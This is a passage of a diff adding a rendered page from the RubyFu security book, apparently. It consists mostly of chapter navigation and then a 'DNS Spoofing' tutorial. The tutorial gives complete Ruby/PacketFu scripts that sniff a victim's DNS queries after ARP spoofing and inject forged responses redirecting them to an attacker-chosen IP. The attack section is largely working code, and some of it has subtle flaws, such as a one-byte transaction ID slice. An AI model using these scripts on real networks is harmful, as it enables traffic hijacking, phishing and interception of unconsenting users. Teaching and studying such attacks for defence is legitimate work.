868
+ </a>
869
+
870
+
871
+ <ul class="articles">
872
+
873
+
874
+ <li class="chapter " data-level="5.1" data-path="module_0x5__exploitation_kung_fu/fuzzer.html">
875
+
876
+
877
+ <a href="../module_0x5__exploitation_kung_fu/fuzzer.html">
878
+
879
+ <i class="fa fa-check"></i>
880
+
881
+ <b>5.1.</b>
882
+
883
+ Fuzzer
884
+ </a>
885
+
886
+
887
+ </li>
888
+
889
+ <li class="chapter " data-level="5.2" data-path="module_0x5__exploitation_kung_fu/metasploit.html">
890
+
891
+
892
+ <a href="../module_0x5__exploitation_kung_fu/metasploit.html">
893
+
894
+ <i class="fa fa-check"></i>
895
+
896
+ <b>5.2.</b>
897
+
898
+ Metasploit
899
+ </a>
900
+
901
+
902
+ <ul class="articles">
903
+
904
+
905
+ <li class="chapter " data-level="5.2.1" data-path="module_0x5__exploitation_kung_fu/auxiliary_module.html">
906
+
907
+
908
+ <a href="../module_0x5__exploitation_kung_fu/auxiliary_module.html">
909
+
910
+ <i class="fa fa-check"></i>
911
+
912
+ <b>5.2.1.</b>
913
+
914
+ Auxiliary module
915
+ </a>
916
+
917
+
918
+ </li>
919
+
920
+ <li class="chapter " data-level="5.2.2" data-path="module_0x5__exploitation_kung_fu/exploit_module.html">
921
+
922
+
923
+ <a href="../module_0x5__exploitation_kung_fu/exploit_module.html">
924
+
925
+ <i class="fa fa-check"></i>
926
+
927
+ <b>5.2.2.</b>
928
+
929
+ Exploit module
930
+ </a>
931
+
932
+
933
+ </li>
934
+
935
+ <li class="chapter " data-level="5.2.3" data-path="module_0x5__exploitation_kung_fu/meterpreter.html">
936
+
937
+
938
+ <a href="../module_0x5__exploitation_kung_fu/meterpreter.html">
939
+
940
+ <i class="fa fa-check"></i>
941
+
942
+ <b>5.2.3.</b>
943
+
944
+ Meterpreter
945
+ </a>
946
+
947
+
948
+ <ul class="articles">
949
+
950
+
951
+ <li class="chapter " data-level="5.2.3.1" data-path="module_0x5__exploitation_kung_fu/extensions.html">
952
+
953
+
954
+ <a href="../module_0x5__exploitation_kung_fu/extensions.html">
955
+
956
+ <i class="fa fa-check"></i>
957
+
958
+ <b>5.2.3.1.</b>
959
+
960
+ API and Extensions
961
+ </a>
962
+
963
+
964
+ </li>
965
+
966
+ <li class="chapter " data-level="5.2.3.2" data-path="module_0x5__exploitation_kung_fu/meterpreter_scripting.html">
967
+
968
+
969
+ <a href="../module_0x5__exploitation_kung_fu/meterpreter_scripting.html">
970
+
971
+ <i class="fa fa-check"></i>
972
+
973
+ <b>5.2.3.2.</b>
974
+
975
+ Meterpreter Scripting
976
+ </a>
977
+
978
+
979
+ </li>
980
+
981
+ <li class="chapter " data-level="5.2.3.3" data-path="module_0x5__exploitation_kung_fu/railgun_api_extension.html">
982
+
983
+
984
+ <a href="../module_0x5__exploitation_kung_fu/railgun_api_extension.html">
985
+
986
+ <i class="fa fa-check"></i>
987
+
988
+ <b>5.2.3.3.</b>
989
+
990
+ Railgun API Extension
991
+ </a>
992
+
993
+
994
+ </li>
995
+
996
+
997
+ </ul>
998
+
999
+ </li>
1000
+
1001
+
1002
+ </ul>
1003
+
1004
+ </li>
1005
+
1006
+ <li class="chapter " data-level="5.3" data-path="module_0x5__exploitation_kung_fu/metasm.html">
1007
+
1008
+
1009
+ <a href="../module_0x5__exploitation_kung_fu/metasm.html">
1010
+
1011
+ <i class="fa fa-check"></i>
1012
+
1013
+ <b>5.3.</b>
1014
+
1015
+ metasm
1016
+ </a>
1017
+
1018
+
1019
+ </li>
1020
+
1021
+
1022
+ </ul>
1023
+
1024
+ </li>
1025
+
1026
+ <li class="chapter " data-level="6" data-path="module_0x6__forensic/index.html">
1027
+
1028
+
1029
+ <a href="../module_0x6__forensic/index.html">
1030
+
1031
+ <i class="fa fa-check"></i>
1032
+
1033
+ <b>6.</b>
1034
+
1035
+ Module 0x6 | Forensic Kung Fu
1036
+ </a>
1037
+
1038
+
1039
+ <ul class="articles">
1040
+
1041
+
1042
+ <li class="chapter " data-level="6.1" data-path="module_0x6__forensic/windows_forensic.html">
1043
+
1044
+
1045
+ <a href="../module_0x6__forensic/windows_forensic.html">
1046
+
1047
+ <i class="fa fa-check"></i>
1048
+
1049
+ <b>6.1.</b>
1050
+
1051
+ Windows Forensic
1052
+ </a>
1053
+
1054
+
1055
+ </li>
1056
+
1057
+ <li class="chapter " data-level="6.2" data-path="module_0x6__forensic/android_forensic.html">
1058
+
1059
+
1060
+ <a href="../module_0x6__forensic/android_forensic.html">
1061
+
1062
+ <i class="fa fa-check"></i>
1063
+
1064
+ <b>6.2.</b>
1065
+
1066
+ Android Forensic
1067
+ </a>
1068
+
1069
+
1070
+ </li>
1071
+
1072
+ <li class="chapter " data-level="6.3" data-path="module_0x3__network_kung_fu/network_traffic_analysis.html">
1073
+
1074
+
1075
+ <a href="../module_0x3__network_kung_fu/network_traffic_analysis.html">
1076
+
1077
+ <i class="fa fa-check"></i>
1078
+
1079
+ <b>6.3.</b>
1080
+
1081
+ Network Traffic Analysis
1082
+ </a>
1083
+
1084
+
1085
+ </li>
1086
+
1087
+ <li class="chapter " data-level="6.4" data-path="module_0x6__forensic/parsing_log_files.html">
1088
+
1089
+
1090
+ <a href="../module_0x6__forensic/parsing_log_files.html">
1091
+
1092
+ <i class="fa fa-check"></i>
1093
+
1094
+ <b>6.4.</b>
1095
+
1096
+ Parsing Log Files
1097
+ </a>
1098
+
1099
+
1100
+ </li>
1101
+
1102
+
1103
+ </ul>
1104
+
1105
+ </li>
1106
+
1107
+ <li class="chapter " data-level="7" data-path="references/index.html">
1108
+
1109
+
1110
+ <a href="../references/index.html">
1111
+
1112
+ <i class="fa fa-check"></i>
1113
+
1114
+ <b>7.</b>
1115
+
1116
+ References
1117
+ </a>
1118
+
1119
+
1120
+ </li>
1121
+
1122
+ <li class="chapter " data-level="8" data-path="faqs/index.html">
1123
+
1124
+
1125
+ <a href="../faqs/index.html">
1126
+
1127
+ <i class="fa fa-check"></i>
1128
+
1129
+ <b>8.</b>
1130
+
1131
+ FAQs
1132
+ </a>
1133
+
1134
+
1135
+ </li>
1136
+
1137
+ <li class="chapter " data-level="9" data-path="contributors/index.html">
1138
+
1139
+
1140
+ <a href="../contributors/index.html">
1141
+
1142
+ <i class="fa fa-check"></i>
1143
+
1144
+ <b>9.</b>
1145
+
1146
+ Contributors
1147
+ </a>
1148
+
1149
+
1150
+ <ul class="articles">
1151
+
1152
+
1153
+ <li class="chapter " data-level="9.1" data-path="contributors/todo.html">
1154
+
1155
+
1156
+ <a href="../contributors/todo.html">
1157
+
1158
+ <i class="fa fa-check"></i>
1159
+
1160
+ <b>9.1.</b>
1161
+
1162
+ TODO
1163
+ </a>
1164
+
1165
+
1166
+ </li>
1167
+
1168
+
1169
+ </ul>
1170
+
1171
+ </li>
1172
+
1173
+
1174
+
1175
+
1176
+ <li class="divider"></li>
1177
+ <li>
1178
+ <a href="https://www.gitbook.com" target="blank" class="gitbook-link">
1179
+ Published with GitBook
1180
+ </a>
1181
+ </li>
1182
+
1183
+ </ul>
1184
+ </nav>
1185
+ </div>
1186
+
1187
+ <div class="book-body">
1188
+ <div class="body-inner">
1189
+ <div class="book-header" role="navigation">
1190
+ <!-- Actions Left -->
1191
+
1192
+
1193
+ <!-- Title -->
1194
+ <h1>
1195
+ <i class="fa fa-circle-o-notch fa-spin"></i>
1196
+ <a href="../" >RubyFu</a>
1197
+ </h1>
1198
+ </div>
1199
+
1200
+ <div class="page-wrapper" tabindex="-1" role="main">
1201
+ <div class="page-inner">
1202
+
1203
+
1204
+ <section class="normal" id="section-">
1205
+
1206
+ <h1 id="dns-spoofing"><a name="dns-spoofing" class="plugin-anchor" href="#dns-spoofing"><span class="fa fa-link"></span></a>DNS Spoofing</h1>
1207
+ <p>Continuing our attack through <a href="module_0x4__network_kung_fu/arp_spoofing.md">ARP Spoofing</a>, we want to change the victim&apos;s DNS request to whatever destination we like.</p>
1208
+ <h3 id="scenario"><a name="scenario" class="plugin-anchor" href="#scenario"><span class="fa fa-link"></span></a>Scenario</h3>
1209
+ <pre><code> |Attacker|
1210
+ | AttackerSite
1211
+ &#x667; AttackerSite
1212
+ |Victim| ----------/ \----------&gt; |Router| ----------&gt; Internet
1213
+ AnySite AttackerSite
1214
+ </code></pre><blockquote>
1215
+ <p>Keep the ARP spoof attack running</p>
1216
+ </blockquote>
1217
+ <p>The same IPs of ARP spoof attack</p>
1218
+ <table>
1219
+ <thead>
1220
+ <tr>
1221
+ <th style="text-align:center">Host</th>
1222
+ <th style="text-align:center">IP Address</th>
1223
+ </tr>
1224
+ </thead>
1225
+ <tbody>
1226
+ <tr>
1227
+ <td style="text-align:center">Attacker</td>
1228
+ <td style="text-align:center">192.168.0.100</td>
1229
+ </tr>
1230
+ <tr>
1231
+ <td style="text-align:center">Victim</td>
1232
+ <td style="text-align:center">192.168.0.21</td>
1233
+ </tr>
1234
+ <tr>
1235
+ <td style="text-align:center">Router</td>
1236
+ <td style="text-align:center">192.168.0.1</td>
1237
+ </tr>
1238
+ </tbody>
1239
+ </table>
1240
+ <p>Now we cant intercept DNS Query packet coming from victim&apos;s machine. Since PacketFu supports filters in capturing (to reduce mount of captured packets) we&apos;ll use <code>udp and port 53 and host</code> filter, then we&apos;ll inspect the captured packet to ensure that it&apos;s a query then find the requested domain. <a href="../files/module03/dns_spoofing_dns-req_res.pcap.pcapng"><strong>Download DNS packet</strong></a>.</p>
1241
+ <p>From Wireshark, if we take a deeper look at the DNS query payload in <code>Domain Name System (query)</code>, we can see its been presented in hexadecimal format.</p>
1242
+ <table>
1243
+ <thead>
1244
+ <tr>
1245
+ <th style="text-align:center"><img src="../images/module03/dns_spoofing_wireshark1.png" alt="Wireshark"></th>
1246
+ </tr>
1247
+ </thead>
1248
+ <tbody>
1249
+ <tr>
1250
+ <td style="text-align:center"><strong>Figure 1.</strong> DNS query Payload</td>
1251
+ </tr>
1252
+ </tbody>
1253
+ </table>
1254
+ <p>Let&apos;s to anatomize our payload</p>
1255
+ <pre><code>0000 e7 1d 01 00 00 01 00 00 00 00 00 00 07 74 77 69
1256
+ 0010 74 74 65 72 03 63 6f 6d 00 00 01 00 01
1257
+ </code></pre><ul>
1258
+ <li>The First 2 bytes is the <strong>Transaction ID</strong> and we don&apos;t care about it for now. (Our case: <code>\xe7\x1d</code>)</li>
1259
+ <li>The next 2 bytes is the <strong>Flags</strong><sup><a href="#fn_3" id="reffn_3">3</a></sup>. (We need: <code>\x01\x00</code> = \x10)</li>
1260
+ <li>Furthermore, in <strong>Queries</strong> section which contains</li>
1261
+ </ul>
1262
+ <pre><code>0000 07 74 77 69 74 74 65 72 03 63 6f 6d 00 00 01 00
1263
+ 0010 01
1264
+ </code></pre><ul>
1265
+ <li><p>The <strong>Queries</strong> starts at <em>13 byte</em> of the payload.</p>
1266
+ <ul>
1267
+ <li><p>The 13th byte specifies the length of the domain name <em>before</em> the <em>very first dot</em> (without last dot com or whatever the top domain is). (Our case: <code>\x07</code>)
1268
+ <strong>Try:</strong><code>[%w{ 74 77 69 74 74 65 72 }.join].pack(&quot;H*&quot;)</code></p>
1269
+ <ul>
1270
+ <li>Notice The domain name of &quot;twitter.com&quot; equals <code>\x07</code> but &quot;www.twitter.com&quot; equals <code>\x03</code> the same consideration for subdomains</li>
1271
+ <li><p>Each dot after first dot will be replaced with the length of the followed characters</p>
1272
+ <p><strong>e.g.</strong> www.google.co.uk</p>
1273
+ <ul>
1274
+ <li>First length (<strong>www</strong>) =&gt; will be replaced with <code>\x03</code></li>
1275
+ <li>First dot(<strong>.google</strong>) =&gt; will be replaced with <code>\x06</code></li>
1276
+ <li>Second dot(<strong>.co</strong>) =&gt; will be replaced with <code>\x02</code></li>
1277
+ <li>Third dot(<strong>.uk</strong>) =&gt; will be replaced with <code>\x02</code></li>
1278
+ </ul>
1279
+ </li>
1280
+ </ul>
1281
+ </li>
1282
+ <li><p>The very end of the domain name string is terminated by a <code>\x00</code>.</p>
1283
+ </li>
1284
+ <li>The next 2 bytes refers to the <strong>type of the query</strong><sup><a href="#fn_4" id="reffn_4">4</a></sup>. (Our case: <code>\x00\x01</code>)</li>
1285
+ </ul>
1286
+ </li>
1287
+ </ul>
1288
+ <p><strong>Now what?!</strong></p>
1289
+ <ul>
1290
+ <li>We need to start capturing/sniffing on specific interface</li>
1291
+ <li>We need to enable promiscuous mode on our interface</li>
1292
+ <li>We need to capture UDP packets on port 53 only</li>
1293
+ <li>We need parse/analyze the valid UDP packets only</li>
1294
+ <li>We need to make sure this packet is a DNS query</li>
1295
+ <li>We need to get the queried/requested domain<ul>
1296
+ <li>We need to know the domain length</li>
1297
+ <li>We need to get the FQDN</li>
1298
+ </ul>
1299
+ </li>
1300
+ <li>Build a DNS response</li>
1301
+ <li>Replace the requested domain with any domain we want</li>
1302
+ <li>Re inject the packet into victim connection and send</li>
1303
+ </ul>
1304
+ <p>I&apos;ll divide our tasks then wrap it up in one script</p>
1305
+ <pre><code class="lang-ruby"><span class="hljs-comment">#!/usr/bin/env ruby</span>
1306
+ <span class="hljs-comment">#</span>
1307
+ <span class="hljs-keyword">require</span> <span class="hljs-string">&apos;packetfu&apos;</span>
1308
+
1309
+ <span class="hljs-keyword">include</span> <span class="hljs-constant">PacketFu</span>
1310
+
1311
+ <span class="hljs-comment">#</span>
1312
+ <span class="hljs-comment"># * We need to start capturing/sniffing on specific interface</span>
1313
+ <span class="hljs-comment"># * We need to enable promiscuous mode on our interface</span>
1314
+ <span class="hljs-comment"># * We need to capture UDP packets on port 53 only</span>
1315
+ <span class="hljs-comment">#</span>
1316
+ filter = <span class="hljs-string">&quot;udp and port 53 and host &quot;</span> + <span class="hljs-string">&quot;192.168.0.21&quot;</span>
1317
+ capture = <span class="hljs-constant">Capture</span>.new(<span class="hljs-symbol">:iface</span> =&gt; <span class="hljs-string">&quot;wlan0&quot;</span>,<span class="hljs-symbol">:start</span> =&gt; <span class="hljs-keyword">true</span>, <span class="hljs-symbol">:promisc</span> =&gt; <span class="hljs-keyword">true</span>, <span class="hljs-symbol">:filter</span> =&gt; filter, <span class="hljs-symbol">:save</span> =&gt; <span class="hljs-keyword">true</span>)
1318
+
1319
+ <span class="hljs-comment"># * We need to get the queried/requested domain</span>
1320
+ <span class="hljs-comment"># * We need to know the domain length</span>
1321
+ <span class="hljs-comment"># * We need to get the FQDN</span>
1322
+ <span class="hljs-comment">#</span>
1323
+ <span class="hljs-comment"># Convert DNS Payload to readable - Find The FQDN</span>
1324
+ <span class="hljs-comment">#</span>
1325
+ <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">readable</span><span class="hljs-params">(raw_domain)</span></span>
1326
+ <span class="hljs-comment"># Prevent processing non domain</span>
1327
+ <span class="hljs-keyword">if</span> raw_domain[<span class="hljs-number">0</span>].ord == <span class="hljs-number">0</span>
1328
+ puts <span class="hljs-string">&quot;ERROR : THE RAW STARTS WITH 0&quot;</span>
1329
+ <span class="hljs-keyword">return</span> raw_domain[<span class="hljs-number">1</span>..-<span class="hljs-number">1</span>]
1330
+ <span class="hljs-keyword">end</span>
1331
+
1332
+ fqdn = <span class="hljs-string">&quot;&quot;</span>
1333
+ length_offset = raw_domain[<span class="hljs-number">0</span>].ord
1334
+ full_length = raw_domain[ <span class="hljs-number">0</span>..length_offset ].length
1335
+ domain_name = raw_domain[(full_length - length_offset)..length_offset]
1336
+
1337
+ <span class="hljs-keyword">while</span> length_offset != <span class="hljs-number">0</span>
1338
+ fqdn &lt;&lt; domain_name + <span class="hljs-string">&quot;.&quot;</span>
1339
+ length_offset = raw_domain[full_length].ord
1340
+ domain_name = raw_domain[full_length + <span class="hljs-number">1</span>..full_length + length_offset]
1341
+ full_length = raw_domain[<span class="hljs-number">0</span>..full_length + length_offset].length
1342
+ <span class="hljs-keyword">end</span>
1343
+
1344
+ <span class="hljs-keyword">return</span> fqdn.chomp!(<span class="hljs-string">&apos;.&apos;</span>)
1345
+ <span class="hljs-keyword">end</span>
1346
+
1347
+ <span class="hljs-comment"># * We need parse/analyze the valid UDP packets only</span>
1348
+ <span class="hljs-comment"># * We need to make sure this packet is a DNS query</span>
1349
+ <span class="hljs-comment">#</span>
1350
+ <span class="hljs-comment"># Find the DNS packets</span>
1351
+ <span class="hljs-comment">#</span>
1352
+ capture.stream.each <span class="hljs-keyword">do</span> |pkt|
1353
+ <span class="hljs-comment"># Make sure we can parse the packet; if we can, parse it</span>
1354
+ <span class="hljs-keyword">if</span> <span class="hljs-constant">UDPPacket</span>.can_parse?(pkt)
1355
+ <span class="hljs-variable">@packet</span> = <span class="hljs-constant">Packet</span>.parse(pkt)
1356
+
1357
+ <span class="hljs-comment"># Make sure we have a query packet</span>
1358
+ dns_query = <span class="hljs-variable">@packet</span>.payload[<span class="hljs-number">2</span>..<span class="hljs-number">3</span>].to_s
1359
+
1360
+ <span class="hljs-keyword">if</span> dns_query == <span class="hljs-string">&quot;\x01\x00&quot;</span>
1361
+ <span class="hljs-comment"># Get the domain name into a readable format</span>
1362
+ domain_name = <span class="hljs-variable">@packet</span>.payload[<span class="hljs-number">12</span>..-<span class="hljs-number">1</span>].to_s <span class="hljs-comment"># FULL QUERY</span>
1363
+ fqdn = readable(domain_name)
1364
+
1365
+ <span class="hljs-comment"># Ignore non query packet</span>
1366
+ <span class="hljs-keyword">next</span> <span class="hljs-keyword">if</span> domain_name.<span class="hljs-keyword">nil</span>?
1367
+
1368
+ puts <span class="hljs-string">&quot;DNS request for: &quot;</span> + fqdn
1369
+ <span class="hljs-keyword">end</span>
1370
+ <span class="hljs-keyword">end</span>
1371
+ <span class="hljs-keyword">end</span>
1372
+ </code></pre>
1373
+ <p>Till now we successfully finished <a href="module_0x3__network_kung_fu/arp_spoofing.md">ARP Spoofing</a> then DNS capturing but still we need to replace/spoof the original response to our domain. e.g. attacker.zone, now we have to build a DNS response instead of spoofed to be sent. So what we need?</p>
1374
+ <ul>
1375
+ <li>taking the IP we are going to redirect the user to (the spoofing_ip)<ul>
1376
+ <li>converting it into hex using the <code>to_i</code> and <code>pack</code> methods.</li>
1377
+ </ul>
1378
+ </li>
1379
+ <li>From there we create a new UDP packet using the data contained in <code>@ourInfo</code> (IP and MAC) and fill in the normal UDP fields.<ul>
1380
+ <li>I take most of this information straight from the DNS Query packet.</li>
1381
+ </ul>
1382
+ </li>
1383
+ <li>The next step is to create the DNS Response.<ul>
1384
+ <li>the best way to understand the code here is to look at a DNS header and then</li>
1385
+ <li>take the bit map of the HEX values and apply them to the header.</li>
1386
+ <li>This will let you see what flags are being set.</li>
1387
+ </ul>
1388
+ </li>
1389
+ <li>From here, we just calculate the checksum for the UDP packet and send it out to the target&apos;s machine.</li>
1390
+ </ul>
1391
+ <table>
1392
+ <thead>
1393
+ <tr>
1394
+ <th style="text-align:center"><img src="dns_spoofing_Wireshark2.png" alt="Wireshark"></th>
1395
+ </tr>
1396
+ </thead>
1397
+ <tbody>
1398
+ <tr>
1399
+ <td style="text-align:center"><strong>Figure 2.</strong> DNS Response Payload</td>
1400
+ </tr>
1401
+ </tbody>
1402
+ </table>
1403
+ <pre><code class="lang-ruby">
1404
+ spoofing_ip = <span class="hljs-string">&quot;69.171.234.21&quot;</span>
1405
+ spoofing_ip.split(<span class="hljs-string">&apos;.&apos;</span>).map {|octet| octet.to_i}.pack(<span class="hljs-string">&apos;c*&apos;</span>)
1406
+
1407
+ response = <span class="hljs-constant">UDPPacket</span>.new(<span class="hljs-symbol">:config</span> =&gt; <span class="hljs-constant">PacketFu::Utils</span>.ifconfig(<span class="hljs-string">&quot;wlan0&quot;</span>))
1408
+ response.udp_src = packet.udp_dst
1409
+ response.udp_dst = packet.udp_src
1410
+ response.ip_saddr = packet.ip_daddr
1411
+ response.ip_daddr = <span class="hljs-string">&quot;192.168.0.21&quot;</span>
1412
+ response.eth_daddr = <span class="hljs-string">&quot;00:0C:29:38:1D:61&quot;</span>
1413
+ </code></pre>
1414
+ <p>Wrapping up </p>
1415
+ <pre><code class="lang-ruby"><span class="hljs-comment">#!/usr/bin/env ruby</span>
1416
+ <span class="hljs-comment"># -*- coding: binary -*-</span>
1417
+
1418
+ <span class="hljs-comment"># Start the capture process</span>
1419
+ <span class="hljs-keyword">require</span> <span class="hljs-string">&apos;packetfu&apos;</span>
1420
+ <span class="hljs-keyword">require</span> <span class="hljs-string">&apos;pp&apos;</span>
1421
+ <span class="hljs-keyword">include</span> <span class="hljs-constant">PacketFu</span>
1422
+
1423
+
1424
+ <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">readable</span><span class="hljs-params">(raw_domain)</span></span>
1425
+
1426
+ <span class="hljs-comment"># Prevent processing non domain</span>
1427
+ <span class="hljs-keyword">if</span> raw_domain[<span class="hljs-number">0</span>].ord == <span class="hljs-number">0</span>
1428
+ puts <span class="hljs-string">&quot;ERROR : THE RAW STARTS WITH 0&quot;</span>
1429
+ <span class="hljs-keyword">return</span> raw_domain[<span class="hljs-number">1</span>..-<span class="hljs-number">1</span>]
1430
+ <span class="hljs-keyword">end</span>
1431
+
1432
+ fqdn = <span class="hljs-string">&quot;&quot;</span>
1433
+ length_offset = raw_domain[<span class="hljs-number">0</span>].ord
1434
+ full_length = raw_domain[ <span class="hljs-number">0</span>..length_offset ].length
1435
+ domain_name = raw_domain[(full_length - length_offset)..length_offset]
1436
+
1437
+ <span class="hljs-keyword">while</span> length_offset != <span class="hljs-number">0</span>
1438
+ fqdn &lt;&lt; domain_name + <span class="hljs-string">&quot;.&quot;</span>
1439
+ length_offset = raw_domain[full_length].ord
1440
+ domain_name = raw_domain[full_length + <span class="hljs-number">1</span> .. full_length + length_offset]
1441
+ full_length = raw_domain[<span class="hljs-number">0</span> .. full_length + length_offset].length
1442
+ <span class="hljs-keyword">end</span>
1443
+
1444
+ <span class="hljs-keyword">return</span> fqdn.chomp!(<span class="hljs-string">&apos;.&apos;</span>)
1445
+ <span class="hljs-keyword">end</span>
1446
+
1447
+ <span class="hljs-comment">#</span>
1448
+ <span class="hljs-comment"># Send Response</span>
1449
+ <span class="hljs-comment">#</span>
1450
+ <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">spoof_response</span><span class="hljs-params">(packet, domain)</span></span>
1451
+
1452
+ attackerdomain_name = <span class="hljs-string">&apos;rubyfu.net&apos;</span>
1453
+ attackerdomain_ip = <span class="hljs-string">&apos;54.243.253.221&apos;</span>.split(<span class="hljs-string">&apos;.&apos;</span>).map {|oct| oct.to_i}.pack(<span class="hljs-string">&apos;c*&apos;</span>) <span class="hljs-comment"># Spoofing IP</span>
1454
+
1455
+ <span class="hljs-comment"># Build UDP packet</span>
1456
+ response = <span class="hljs-constant">UDPPacket</span>.new(<span class="hljs-symbol">:config</span> =&gt; <span class="hljs-constant">PacketFu::Utils</span>.ifconfig(<span class="hljs-string">&quot;wlan0&quot;</span>))
1457
+ response.udp_src = packet.udp_dst <span class="hljs-comment"># source port</span>
1458
+ response.udp_dst = packet.udp_src <span class="hljs-comment"># destination port</span>
1459
+ response.ip_saddr = packet.ip_daddr <span class="hljs-comment"># modem&apos;s IP address to be source</span>
1460
+ response.ip_daddr = packet.ip_saddr <span class="hljs-comment"># victim&apos;s IP address to be destination</span>
1461
+ response.eth_daddr = packet.eth_saddr <span class="hljs-comment"># the victim&apos;s MAC address</span>
1462
+ response.payload = packet.payload[<span class="hljs-number">0</span>,<span class="hljs-number">1</span>] <span class="hljs-comment"># Transaction ID</span>
1463
+ response.payload += <span class="hljs-string">&quot;\x81\x80&quot;</span> <span class="hljs-comment"># Flags: Reply code: No error (0)</span>
1464
+ response.payload += <span class="hljs-string">&quot;\x00\x01&quot;</span> <span class="hljs-comment"># Question: 1</span>
1465
+ response.payload += <span class="hljs-string">&quot;\x00\x00&quot;</span> <span class="hljs-comment"># Answer RRs: 0</span>
1466
+ response.payload += <span class="hljs-string">&quot;\x00\x00&quot;</span> <span class="hljs-comment"># Authority RRs: 0</span>
1467
+ response.payload += <span class="hljs-string">&quot;\x00\x00&quot;</span> <span class="hljs-comment"># Additional RRs: 0</span>
1468
+ response.payload += attackerdomain_name.split(<span class="hljs-string">&apos;.&apos;</span>).map <span class="hljs-keyword">do</span> |section| <span class="hljs-comment"># Queries | Name: , Convert domain to DNS style(the opposite of readable method)</span>
1469
+ [section.size.chr, section.chars.map {|c| <span class="hljs-string">&apos;\x%x&apos;</span> % c.ord}.join]
1470
+ <span class="hljs-keyword">end</span>.join + <span class="hljs-string">&quot;\x00&quot;</span>
1471
+ response.payload += <span class="hljs-string">&quot;\x00\x01&quot;</span> <span class="hljs-comment"># Queries | Type: A (Host address)</span>
1472
+ response.payload += <span class="hljs-string">&quot;\x00\x01&quot;</span> <span class="hljs-comment"># Queries | Class: IN (0x0001)</span>
1473
+ response.payload += <span class="hljs-string">&quot;\xc0\x0c&quot;</span> <span class="hljs-comment"># Answer | Name: twitter.com</span>
1474
+ response.payload += <span class="hljs-string">&quot;\x00\x01&quot;</span> <span class="hljs-comment"># Answer | Type: A (Host address)</span>
1475
+ response.payload += <span class="hljs-string">&quot;\x00\x01&quot;</span> <span class="hljs-comment"># Answer | Class: IN (0x0001)</span>
1476
+ response.payload += <span class="hljs-string">&quot;\x00\x00\x00\x25&quot;</span> <span class="hljs-comment"># Answer | Time to live: 37 seconds</span>
1477
+ response.payload += <span class="hljs-string">&quot;\x00\x04&quot;</span> <span class="hljs-comment"># Answer | Data length: 4</span>
1478
+ response.payload += attackerdomain_ip <span class="hljs-comment"># Answer | Addr</span>
1479
+ response.recalc <span class="hljs-comment"># Calculate the packet</span>
1480
+ response.to_w(response.iface) <span class="hljs-comment"># Send the packet through our interface</span>
1481
+ <span class="hljs-keyword">end</span>
1482
+
1483
+ filter = <span class="hljs-string">&quot;udp and port 53 and host &quot;</span> + <span class="hljs-string">&quot;192.168.0.21&quot;</span>
1484
+ <span class="hljs-variable">@capture</span> = <span class="hljs-constant">Capture</span>.new(<span class="hljs-symbol">:iface</span> =&gt; <span class="hljs-string">&quot;wlan0&quot;</span>, <span class="hljs-symbol">:start</span> =&gt; <span class="hljs-keyword">true</span>, <span class="hljs-symbol">:promisc</span> =&gt; <span class="hljs-keyword">true</span>, <span class="hljs-symbol">:filter</span> =&gt; filter, <span class="hljs-symbol">:save</span> =&gt; <span class="hljs-keyword">true</span>)
1485
+ <span class="hljs-comment"># Find the DNS packets</span>
1486
+ <span class="hljs-variable">@capture</span>.stream.each <span class="hljs-keyword">do</span> |pkt|
1487
+ <span class="hljs-comment"># Make sure we can parse the packet; if we can, parse it</span>
1488
+ <span class="hljs-keyword">if</span> <span class="hljs-constant">UDPPacket</span>.can_parse?(pkt)
1489
+ packet = <span class="hljs-constant">Packet</span>.parse(pkt)
1490
+
1491
+ <span class="hljs-comment"># Get the offset of the query type: (request=\x01\x00, response=\x81\x80)</span>
1492
+ dns_query = packet.payload[<span class="hljs-number">2</span>..<span class="hljs-number">3</span>].to_s
1493
+
1494
+ <span class="hljs-comment"># Make sure we have a dns query packet</span>
1495
+ <span class="hljs-keyword">if</span> dns_query == <span class="hljs-string">&quot;\x01\x00&quot;</span>
1496
+ <span class="hljs-comment"># Get the domain name into a readable format</span>
1497
+ domain_name = packet.payload[<span class="hljs-number">12</span>..-<span class="hljs-number">1</span>].to_s <span class="hljs-comment"># FULL DOMAIN</span>
1498
+ fqdn = readable(domain_name)
1499
+ <span class="hljs-comment"># Ignore non query packet</span>
1500
+ <span class="hljs-keyword">next</span> <span class="hljs-keyword">if</span> domain_name.<span class="hljs-keyword">nil</span>?
1501
+ puts <span class="hljs-string">&quot;DNS request for: &quot;</span> + fqdn
1502
+
1503
+ <span class="hljs-keyword">end</span>
1504
+ <span class="hljs-comment"># Make sure we have a dns reply packet</span>
1505
+ <span class="hljs-keyword">if</span> dns_query == <span class="hljs-string">&quot;\x81\x80&quot;</span>
1506
+ domain_name = packet.payload[<span class="hljs-number">12</span>..-<span class="hljs-number">1</span>].to_s <span class="hljs-comment"># FULL DOMAIN</span>
1507
+ fqdn = readable(domain_name)
1508
+ puts <span class="hljs-string">&quot;[*] Start Spoofing: &quot;</span> + fqdn
1509
+ spoof_response packet, domain_name
1510
+ <span class="hljs-keyword">end</span>
1511
+
1512
+ <span class="hljs-keyword">end</span>
1513
+ <span class="hljs-keyword">end</span>
1514
+ </code></pre>
1515
+ <p><a href="https://github.com/SilverFoxx/Spoofa/blob/master/spoofa" target="_blank">https://github.com/SilverFoxx/Spoofa/blob/master/spoofa</a></p>
1516
+ <p>Sources<sup><a href="#fn_1" id="reffn_1">1</a></sup> <sup><a href="#fn_2" id="reffn_2">2</a></sup> - The code has been modified and fixed</p>
1517
+ <h2 id=""><a name="" class="plugin-anchor" href="#"><span class="fa fa-link"></span></a><br><br><br></h2>
1518
+ <blockquote id="fn_1">
1519
+ <sup>1</sup>. <a href="http://crushbeercrushcode.org/2012/10/ruby-dns-spoofing-using-packetfu/" target="_blank">DNS Spoofing Using PacketFu</a><a href="#reffn_1" title="Jump back to footnote [1] in the text."> &#x21A9;</a>
1520
+ </blockquote>
1521
+ <blockquote id="fn_2">
1522
+ <sup>2</sup>. <a href="http://tuftsdev.github.io/DefenseOfTheDarkArts/assignments/manipulatingthenetworkwithpacketfu-110314111058-phpapp01.pdf" target="_blank">Manipulating The Network with PacketFu</a><a href="#reffn_2" title="Jump back to footnote [2] in the text."> &#x21A9;</a>
1523
+ </blockquote>
1524
+ <blockquote id="fn_3">
1525
+ <sup>3</sup>. <a href="http://www.iana.org/assignments/dns-parameters/dns-parameters.xhtml#dns-parameters-12" target="_blank">DNS Header Flags</a><a href="#reffn_3" title="Jump back to footnote [3] in the text."> &#x21A9;</a>
1526
+ </blockquote>
1527
+ <table>
